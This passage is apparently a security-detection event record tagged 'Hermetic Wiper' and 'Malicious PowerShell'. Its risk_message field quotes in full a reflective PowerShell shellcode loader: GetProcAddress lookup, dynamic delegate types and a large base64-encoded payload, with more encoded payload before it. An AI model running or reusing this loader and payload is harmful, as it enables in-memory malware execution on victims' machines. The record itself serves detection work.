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", UserID="'S-1-5-18'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T12:11:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:11:41", risk_message="A suspicious powershell script contains reflective class assembly command in Set-StrictMode -Version 2 $DoIt = @' function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('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